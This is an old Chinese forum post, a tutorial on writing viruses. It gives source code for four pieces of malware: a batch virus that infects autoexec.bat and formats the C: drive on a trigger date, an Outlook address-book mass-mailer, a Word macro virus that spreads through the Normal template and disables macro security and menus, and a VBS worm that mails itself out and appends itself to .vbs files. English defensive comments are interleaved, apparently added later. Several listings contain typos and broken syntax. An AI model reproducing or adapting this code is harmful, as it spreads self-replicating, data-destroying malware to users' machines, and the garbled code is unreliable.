发信人: fast (平淡), 信区: Virus
标 题: 揭开病毒的冰山一角
发信站: 荔园晨风BBS站 (Wed Sep 19 18:08:24 2001), 转信
揭开病毒的冰山一角
不知是为什么最近B人想把一些我认为很能吸引人的东西写出来让大家赏析
一下,于是便有了本文。
A.一个简单例子--批处理病毒
提到批处理,谁都知道。But要用它写病毒,就不一定有人听说过了。其实
用它来写Virus是非常简单的,不信Please看下面的例程:
;病毒名称:Example.bat
;清屏并隐藏下面的操作
cls
ctty nul
if %1.==-f.shirt
:next
if not %1==*~del%1
shift
if not %.==.goto next
;下面的代码用于检查要感染的文件是否被感染过
type c:\autoexec.bat|find /i "%windir%\command\format c:
/autotext/u/select";检查有无特征码
if not errorlevel 1 goto tryvirus;有特征码转去执行tryvirus块
goto copyvirus;没有转去copyvirus块
:tryvirus
type nul>c:\todayis.dat
dir c:\todayis.dat{find"-2-14-";建立空文件todayis.dat并检查今天日期是否
是发作日期--2月14日
if not errorlevel 1 goto warw
:copyvirus
for % %f in (c:\autoexec.bat) do copy % %f+example.bat
goto tryvirus
:warw
del c:\todayis.dat
%windir%\command\format c: /autoexec/u/select;这条指令彻底毁掉你的C盘!
!
:end
del c:\todayis.dat
%windir%\win
看了上面的例程,想必各位都明白了--批处理也是可以用来写病毒的
B.更进一步
前些日子“爱虫”闹得很火,它的发送功能对某些人而言是个“奇技”,其
实这种功能是利用Outlook对象的方法来做的,这个B人相信大家一看便知其中奥
妙。(下面我们就来实现它)
' Purpose (per the surrounding text): use the Outlook object model to build, for
' each address list, one mail item addressed to every entry in that list.
' Defender's view: a script or macro that instantiates Outlook through
' CreateObject and then walks AddressLists/AddressEntries is the behaviour that
' Outlook's object-model security prompts were introduced to interrupt. Keep
' those prompts enabled, and treat Office macros or script hosts automating
' Outlook as a detection signal.
Dim x, y, i, addybook, peep
Dim outlookapp, mapiname, slice
Set outlookapp = CreateObject("Outlook.Appliction")
Set mapiname = outlookapp.GetNameSpace("MAPI")
mapiname.Logon
' Outer loop: one pass per address list exposed by the MAPI namespace.
For y = 1 To mapiname.AddressLists.Count
Set addybook = mapiname.AddressLists(y)
' x is the entry index used below; it advances once per inner iteration.
x = 1
' CreateItem(0) requests a mail item (0 is olMailItem).
Set slice = outlookapp.CreateItem(0)
For i = 1 To addybook.AddressEntries.Count
peep = addybook.AddressEntries(x)
slice.Recipients.Add peep'address
x = x + 1
Next i
slice.Subject = "标题"
slice.Body = "内容"
slice.Attachments .Add Appliction.Name'attachment
peep = ""
Next y
mapiname.Logoff
(以上代码可以用于VBA,VBS,VB中。)
C.谈谈宏病毒
说句实话B人不喜欢谈论宏病毒,because关于it的东西太多了一时talk不
完。言归正传,要写宏病毒先要明白如何感染文档,这个问题并不难解决(对
于我而言)。下面我们以Word为例来解决它:
;基于安全问题本部分不加注释
' Defender's view: the author left this listing uncommented on purpose, and this
' note does not walk through it. What matters for defence is visible in the
' first lines: the code reaches into ActiveDocument.VBProject and
' NormalTemplate.VBProject and edits their code modules.
' Mitigation: programmatic access to the VBA project is governed by Office's
' "Trust access to the VBA project object model" setting; leave it disabled, and
' treat unexpected changes to the Normal template as a sign of compromise.
' Triage hint: the strings "Private Sub Document_Open()" and
' "Private Sub Document_Close()" below are the auto-run handlers to look for when
' examining the macro project of a suspicious document.
Dim adim, ntim, ntcl, adcl, toin, dont, doad, bgn
Set adim = ActiveDocument.VBProject.VBComponents.Item(1)
Set ntim = NormalTemplate.VBProject.VBComponents.Item(1)
ntcl = ntim.CodeModule.CountOfLines
adcl = adim.CodeModule.CountOfLines
bgn = 2
If adim.Name <> "识别码(病毒名)" Then
If adcl > 0 Then adim.CodeModule.DeleteLines 1, adcl
Set toin = adim
adim.Name = "识别码(病毒名)"
doad = True
End If
If ntim.Name <> "识别码(病毒名)" Then
If ntcl > 0 Then ntim.CodeModule.DeleteLines 1, ntcl
Set toin = ntim
ntim.Name = "识别码(病毒名)"
dont = True
End If
If dont <> True And doad <> True Then GoTo cat
If dont = True Then
Do While adim.CodeModule.Lines(1, 1) = ""
adim.CodeModule.DeleteLines 1
Loop
toin.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While adim.CodeModule.Lines(bgn, 1) <> ""
toin.CodeModule.InsertLines bgn, adim.CodeModule.Lines(bgn, 1)
bgn = bgn + 1
Loop
bgn=2
End If
If doad = True Then
Do While ntim.CodeModule.Lines(1, 1) = ""
ntim.CodeModule.DeleteLines 1
Loop
toin.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While ntim.CodeModule.Lines(bgn, 1) <> ""
toin.CodeModule.InsertLines bgn, ntim.CodeModule.Lines(bgn, 1)
bgn = bgn + 1
Loop
bgn=2
End If
cat:
If ntcl <> 0 And adcl <> 0 And (InStr(1, ActiveDocument.Name,
"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ntcl <> 0 And adcl <> 0 And (InStr(1, ActiveDocument.Name, "Document"
<> False)) Then
AdctiveDocument.Saved = True
End If
(将上述的代码放到Private Sub Document_Open()中就可以达到文档开启时
运行的目的。)
写宏病毒的第二步是要如何隐藏病毒,其方法就是要屏蔽掉与宏有关的一切
东西。(同样这里也以Word为例。)
' Defender's view: this listing tampers with Word's macro-related settings and
' menus so that a user cannot inspect or switch off macros. As written, it:
'   - reads, then assigns, the "level" value under the Office 9.0 Word security key;
'   - sets .Enabled = False on the "Security..." / "Macro..." command-bar controls;
'   - assigns (1 - 1), i.e. 0, to Options.ConfirmConversions,
'     Options.VirusProtection and Options.SaveNormalPrompt;
'   - re-points OnAction to "AutoClose" for several Tools-menu entries and for
'     every control on the "Visual Basic" command bar.
' Detection / mitigation: enforce the macro security level through policy rather
' than per-user settings, alert on changes to that security value, and treat
' Word menus whose macro or options entries are greyed out or inert as a sign
' that a document macro has run.
' On Error Resume Next suppresses runtime errors for everything that follows.
On Error Resume Next
If System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\word\security",
"level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\word\security",
"level") = 1&
Else
CommmandBars("Tools").Controls("Macro...").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
' Tools-menu entries are matched by their localized (Chinese) captions.
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "自定义(C)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "模板和加载(I)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "选项(O)..." Then
mItem.OnAction = "AutoClose"
End If
Next mItem
' Second pass: descend into the popup submenu captioned "宏(M)".
For Each cItem In CommandBars("Tools").Controls
If cItem.Type = msoControlPopup Then
If cItem.Caption = "宏(M)" Then
For Each mItem In cItem.CommandBars.Controls
If mItem.Caption = "宏(M)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "Visual Basci 编辑器(V)" Then
mItem.OnAction = "AutoClose"
End If
Next mItem
End If
End If
Next cItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.OnAction = "AutoClose"
Next cItem
关于宏病毒我们就到此为止了。至于避免重复感染等等内容并不难实现,
相信大家可以独自解决。
D.尾声
为了让大家更好了解病毒,这里B人给出一个良性VBS病毒的源代码。
' Defender's view: top-level flow of the sample the author presents as a benign
' VBS virus. As written it (1) reads a marker under "HKEY_CURREN_USER\Phoenix1.0a"
' and continues only when the value is not "die", (2) repeats the Outlook
' address-book loop shown earlier on the page, (3) calls virussafe on the root
' of each drive that passes its DriveType checks, and (4) writes the marker.
' Indicators taken from this listing: the Phoenix1.0a registry marker, a mail
' subject of "Hello!" and a body beginning "please open it".
' Mitigation: restrict Windows Script Host for users who do not need it, filter
' script attachments at the mail gateway, and keep Outlook's object-model
' security prompts enabled.
' On Error Resume Next suppresses runtime errors for everything that follows.
On Error Resume Next
Dim known
Set known = CreateObject("WScript.shell")
If known.RegRead("HKEY_CURREN_USER\Phoenix1.0a", "vbs") <> "die" Then
Dim x, y, i, addybook, peep
Dim outlookapp, mapiname, slice
Set outlookapp = CreateObject("Outlook.Appliction")
Set mapiname = outlookapp.GetNameSpace("MAPI")
mapiname.Logon
For y = 1 To mapiname.AddressLists.Count
Set addybook = mapiname.AddressLists(y)
x = 1
Set slice = outlookapp.CreateItem(0)
For i = 1 To addybook.AddressEntries.Count
peep = addybook.AddressEntries(x)
slice.Recipients.Add peep
x = x + 1
Next i
slice.Subject = "Hello!"
slice.Body = "please open it"&Appliction.Name
slice.Attachments.Add Appliction.Name
peep = ""
Next y
mapiname.Logoff
' Drive enumeration through Scripting.FileSystemObject.
Dim objfso As New Scripting.FileSystemObject
Dim drvloop As Scripting.Drive
For Each drvloop In objfso.Drives
If drvloop.DriveType = Fixed Or drvloop.IsReady Then
If drvloop.DriveType = 3 Then
virussafe drvloop.driveletter&":\"
End If
End If
Next drvloop
Set objfso = Nothing
' Marker written after the run; the RegRead check at the top tests for it.
known.RegWrite("HKEY_CURREN_USER\Phoenix1.0a\vbs","die",REG_STRING)
Else
End
End If
' virussafe(strpath): recursive walk of the folder tree rooted at strpath.
' As written: reads the full text of the file named by Appliction.Name into a,
' compares the last four characters of each file's short path against ".vbs",
' opens matching files (other than Appliction.Name) with I/O mode 8 and writes a,
' then calls itself for every subfolder.
' Defender's view: the observable effect is a script host touching many .vbs
' files across a directory tree in a short time. File-integrity monitoring on
' script directories and alerts on bulk writes to script files by
' wscript/cscript cover this behaviour.
Sub virussafe(strpath As String)
Dim objfolder As Scripting.Folder
Dim objfile As Scripting.File
Dim objsubdirs As Scripting.Folders
Dim sobj As Scripting.FileSystemObject
Dim sobjv, c, fs
Dim a As String
Dim ca As Scripting.TextStream
Dim objloopfolder As Scripting.Folder
Set fs = CreateObject("Scripting.FileSystemObject")
Set ca = fs.GetFile(Appliction.Name)
Set c = ca.OpenTextStream(1, -2)
a = c.ReadAll
c.Close
Set sobjv = CreateObject("Scripting.FileSystemObject")
Set sobj = New Scripting.FileSystemObject
Set objfolder = sobj.GetFolder(strpath)
For Each objfile In objfolder.Files
If UCase$(Right$(objfile.ShortPath, 4)) = ".vbs" Then
If objfile.Path <> Appliction.Name Then
sobjv.OpenTexTFile(objfile.Path,8,-2)
sobjv.Write a
sobjv.Close
End If
End If
Next objfile
' Recursion into each subfolder of strpath.
Set objsubdirs = objfolder.SubFolders
For Each objloopfolder In objsubdirs
virussafe objloopfolder.Path
Next objloopfolder
Set objsubdirs = Nothing
Set objfolder = Nothing
End Sub
E.最后声明
练武之人讲究武德,编程之人也不可倚仗自己的知识胡为。本文只为揭开病
毒的冰山一角以满足一些人的好奇心。以上给出的代码仅供参考,不得乱用。
慎之!!!!
慎之!!!!
文章出处:第八军团
文章作者:JunTuan
--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.127]